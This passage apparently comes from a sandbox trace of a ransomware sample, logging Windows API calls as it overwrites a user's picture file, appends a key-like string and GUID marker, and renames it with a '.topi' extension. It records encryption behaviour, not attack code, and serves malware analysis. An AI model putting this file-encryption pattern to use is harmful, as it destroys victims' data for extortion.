returned 0x99e4a30 [0096.840] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0096.840] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4b98 [0096.840] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a30 | out: hHeap=0x680000) returned 1 [0096.840] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4a30 [0096.840] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49d0 | out: hHeap=0x680000) returned 1 [0096.840] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9f8 [0096.840] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0096.841] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0096.841] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0096.841] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0096.841] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4b68 | out: hHeap=0x680000) returned 1 [0096.841] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4b68 [0096.841] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0096.841] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e9300 [0096.841] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a18 | out: hHeap=0x680000) returned 1 [0096.841] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0096.841] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a30 | out: hHeap=0x680000) returned 1 [0096.841] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9528 [0096.841] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0096.841] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0096.841] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0096.841] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191ac0 [0096.841] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4b68 | out: hHeap=0x680000) returned 1 [0096.841] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x31d5100 [0096.841] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0096.841] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99df068 [0096.841] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0096.841] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df228 | out: hHeap=0x680000) returned 1 [0096.841] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0096.841] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99df068 | out: hHeap=0x680000) returned 1 [0096.841] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0096.841] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191ac0 | out: hHeap=0x680000) returned 1 [0096.841] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9528 | out: hHeap=0x680000) returned 1 [0096.841] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0096.841] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0096.841] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0096.841] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4b98 | out: hHeap=0x680000) returned 1 [0096.842] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0096.842] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a48 | out: hHeap=0x680000) returned 1 [0096.842] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0096.842] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4b80 | out: hHeap=0x680000) returned 1 [0096.842] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4b50 | out: hHeap=0x680000) returned 1 [0096.842] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0096.842] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0096.842] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0096.842] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4b38 | out: hHeap=0x680000) returned 1 [0096.842] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a02dc8 | out: hHeap=0x680000) returned 1 [0096.842] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0096.842] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ded50 | out: hHeap=0x680000) returned 1 [0096.842] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb988 | out: hHeap=0x680000) returned 1 [0096.842] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0096.842] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0096.842] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0096.842] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0096.842] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0096.842] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0096.842] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0096.842] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0096.842] WriteFile (in: hFile=0x6a8, lpBuffer=0x9a06a00*, nNumberOfBytesToWrite=0x1349b, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x9a06a00*, lpNumberOfBytesWritten=0x9ccfb14*=0x1349b, lpOverlapped=0x0) returned 1 [0096.842] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a06a00 | out: hHeap=0x680000) returned 1 [0096.843] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x134a0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.843] WriteFile (in: hFile=0x6a8, lpBuffer=0x99dea38*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99dea38*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0096.843] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dea38 | out: hHeap=0x680000) returned 1 [0096.843] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dff8 [0096.843] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x9a04420 [0096.843] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x9a04420, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0096.843] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d01f0 [0096.843] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0096.843] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dff8 | out: hHeap=0x680000) returned 1 [0096.843] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d01f0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d01f0*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0096.843] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0096.843] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0096.843] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0096.843] CloseHandle (hObject=0x6a8) returned 1 [0096.844] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b41c0 [0096.845] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8a0) returned 0x31cf750 [0096.845] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b41c0 | out: hHeap=0x680000) returned 1 [0096.845] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\IK1V\\Z- 5l9YOa-U25M88Ec9Y.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ik1v\\z- 5l9yoa-u25m88ec9y.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\IK1V\\Z- 5l9YOa-U25M88Ec9Y.gif.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ik1v\\z- 5l9yoa-u25m88ec9y.gif.topi")) returned 1 [0096.845] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0096.845] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0096.845] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.847] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4258 | out: hHeap=0x680000) returned 1 [0096.847] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79deee10, ftCreationTime.dwHighDateTime=0x1d5c4b7, ftLastAccessTime.dwLowDateTime=0x27872d60, ftLastAccessTime.dwHighDateTime=0x1d5be4c, ftLastWriteTime.dwLowDateTime=0x27872d60, ftLastWriteTime.dwHighDateTime=0x1d5be4c, nFileSizeHigh=0x0, nFileSizeLow=0x134a0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Z- 5l9YOa-U25M88Ec9Y.gif", cAlternateFileName="Z-5L9Y~1.GIF")) returned 0 [0096.847] FindClose (in: hFindFile=0x31c7500 | out: hFindFile=0x31c7500) returned 1 [0096.847] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f40 | out: hHeap=0x680000) returned 1 [0096.847] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dd88 | out: hHeap=0x680000) returned 1 [0096.847] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0096.847] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3da8 [0096.847] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0096.847] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4078 [0096.847] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.847] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.847] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4078 | out: hHeap=0x680000) returned 1 [0096.847] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4078 [0096.847] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.847] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.847] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4078 | out: hHeap=0x680000) returned 1 [0096.847] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4078 [0096.847] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.847] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.847] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4078 | out: hHeap=0x680000) returned 1 [0096.847] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4078 [0096.847] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.847] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.847] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4078 | out: hHeap=0x680000) returned 1 [0096.847] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4078 [0096.847] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.847] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.847] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4078 | out: hHeap=0x680000) returned 1 [0096.848] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4078 [0096.848] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0096.848] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.848] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4078 | out: hHeap=0x680000) returned 1 [0096.848] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4078 [0096.848] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.848] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99f25a8 [0096.848] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.848] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0096.848] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4078 | out: hHeap=0x680000) returned 1 [0096.848] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4078 [0096.848] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.848] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.848] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4078 | out: hHeap=0x680000) returned 1 [0096.848] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4078 [0096.848] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0096.848] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.848] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4078 | out: hHeap=0x680000) returned 1 [0096.848] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4078 [0096.848] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0096.848] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0096.848] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4078 | out: hHeap=0x680000) returned 1 [0096.848] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4078 [0096.848] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0096.848] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0096.848] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4078 | out: hHeap=0x680000) returned 1 [0096.848] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4078 [0096.848] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.848] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.848] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4078 | out: hHeap=0x680000) returned 1 [0096.848] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4078 [0096.848] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.848] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.849] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4078 | out: hHeap=0x680000) returned 1 [0096.849] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4078 [0096.849] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0096.849] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.849] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4078 | out: hHeap=0x680000) returned 1 [0096.849] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4078 [0096.849] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0096.849] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.849] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4078 | out: hHeap=0x680000) returned 1 [0096.849] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4078 [0096.849] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.849] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.849] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4078 | out: hHeap=0x680000) returned 1 [0096.849] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4078 [0096.849] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.849] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.849] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4078 | out: hHeap=0x680000) returned 1 [0096.849] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4078 [0096.849] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.849] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.849] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4078 | out: hHeap=0x680000) returned 1 [0096.849] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4078 [0096.849] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.849] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.849] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4078 | out: hHeap=0x680000) returned 1 [0096.849] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4078 [0096.849] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.849] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.849] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4078 | out: hHeap=0x680000) returned 1 [0096.849] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4078 [0096.850] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.850] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.850] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4078 | out: hHeap=0x680000) returned 1 [0096.850] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4078 [0096.850] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.850] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.850] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4078 | out: hHeap=0x680000) returned 1 [0096.850] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4078 [0096.850] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.850] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f25a8 [0096.850] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.850] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0096.850] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4078 | out: hHeap=0x680000) returned 1 [0096.850] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4078 [0096.850] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.850] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.850] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4078 | out: hHeap=0x680000) returned 1 [0096.850] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4078 [0096.850] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.850] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99f25a8 [0096.850] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.850] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0096.850] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4078 | out: hHeap=0x680000) returned 1 [0096.850] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4078 [0096.850] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0096.850] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0096.850] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4078 | out: hHeap=0x680000) returned 1 [0096.850] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4078 [0096.850] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0096.850] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0096.850] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4078 | out: hHeap=0x680000) returned 1 [0096.850] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4078 [0096.850] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.851] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.851] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4078 | out: hHeap=0x680000) returned 1 [0096.851] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4078 [0096.851] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.851] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.851] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4078 | out: hHeap=0x680000) returned 1 [0096.851] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4078 [0096.851] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.851] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f25a8 [0096.851] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.851] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0096.851] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4078 | out: hHeap=0x680000) returned 1 [0096.851] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4078 [0096.851] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0096.851] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.851] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4078 | out: hHeap=0x680000) returned 1 [0096.851] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4078 [0096.851] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0096.851] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.851] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4078 | out: hHeap=0x680000) returned 1 [0096.851] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4078 [0096.851] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.851] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.851] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4078 | out: hHeap=0x680000) returned 1 [0096.851] RtlAllocateHeap (HeapHandle=0x680000, 